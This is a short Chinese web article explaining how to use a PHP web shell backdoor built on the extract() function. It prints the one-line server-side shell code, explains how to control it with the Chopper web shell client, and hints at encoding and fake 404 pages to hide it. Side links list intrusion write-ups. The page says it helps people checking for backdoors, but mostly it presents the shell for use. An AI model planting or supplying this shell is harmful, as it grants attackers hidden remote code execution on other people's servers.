当前位置：代码网 > 服务器>网络安全>脚本攻防 > ODOR1–PHP extract 后门使用方法

ODOR1–PHP extract 后门使用方法

2016年08月22日 • 脚本攻防 •我要评论

ODOR1–PHP extract 后门使用方法这篇文章主要为大家介绍了PHP extract 函数后门的使用方法，大家在检查后门的时候可以多关注一下,需要的朋友可以参考下... 16-08-22

php extract 函数后门
auth:winger[l4f][cgh]
date: 2014-02-24
今天介绍的是一种新的php后门: extract 函数后门.

复制代码

代码如下:

extract
(php 4, php 5)
extract — 从数组中将变量导入到当前的符号表
int extract ( array &$var_array [, int $extract_type = extr_overwrite [, string $prefix = null ]] )
本函数用来将变量从数组中导入到当前的符号表中.

具体应用:

1: php中extract函数各种用法介绍
2: php extract() 函数
3: 官方文档
4: php-backdoors-hidden-with-clever-use-of-extract-function
接下来操刀上马:)
服务端代码:

复制代码

代码如下:

<?@extract($_request);@die($err($info));?>

菜刀使用附加数据提交功能,"编辑shell-->配置",填入下面的内容:

最后加上各种编码,标签和404....你懂得( ‵▽′)ψ

phpcms SQL注入漏洞 adsclass.php 页面过滤不严

phpcms SQL注入漏洞 adsclass.php 页面过滤不严PHPCMS adsclass.php页面过滤不严导致SQL注入漏洞,使用phpcms的朋... [阅读全文]
入侵RedHat Linux系统实例

入侵RedHat Linux系统实例下载：http://210.77.146.151/images/hlc/files/seclpd.c 我写此文的目的不... [阅读全文]
PHPCMS 信息泄露以及任意删除文件漏洞

PHPCMS 信息泄露以及任意删除文件漏洞在图片剪切那里，先读取cookie中信息，然后直接删除文件，造成删除任意文件漏洞... 10-05-25 [阅读全文]
MS07-029漏洞利用入侵过程

MS07-029漏洞利用入侵过程前言：MS07-029，Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前…

2008年10月08日 • 网络安全
IPC$ Password Crack BAT

IPC$ Password Crack BAT有时候在肉鸡下面想整个其他的肉鸡，用SOCK5反向代理，麻烦又慢，有N多线程的IPC$密码破解工具... 10-... [阅读全文]
入侵网站实例

入侵土耳其网站实例打开SQL用查询分析器连上，发现了几个数据库估计是服务器的几个网站共用的这一个SQL server 于是立刻本地构造一个注射点，准备列目录。构造注射点代码如…

2008年10月08日 • 网络安全

发表评论


验证码：

ODOR1–PHP extract 后门使用方法

2016年08月22日 • 脚本攻防 •我要评论

相关文章:

MS07-029漏洞利用入侵过程

入侵网站实例

发表评论